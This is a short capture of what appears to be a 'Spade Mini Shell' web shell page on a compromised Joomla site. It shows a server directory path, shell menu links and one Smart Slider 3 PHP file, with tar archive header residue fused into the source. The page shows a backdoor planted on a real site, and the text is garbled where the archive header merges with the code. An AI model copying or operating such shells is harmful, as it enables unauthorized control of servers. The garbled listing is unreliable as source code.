Spade
Mini Shell
| Directory:~$ /home/lmsyaran/public_html/joomla4/ |
| [Home] [System Details] [Kill Me] |
home/lmsyaran/public_html/j3/libraries/smartslider3/src/Nextend.php000064400000000520151157642760021450
0ustar00<?php
namespace Nextend;
use Nextend\Framework\Pattern\GetPathTrait;
use Nextend\Framework\Pattern\SingletonTrait;
use Nextend\SmartSlider3\Platform\Joomla\JoomlaShim;
class Nextend {
use GetPathTrait;
use SingletonTrait;
protected function init() {
JoomlaShim::triggerEvent('onInitN2Library');
}
}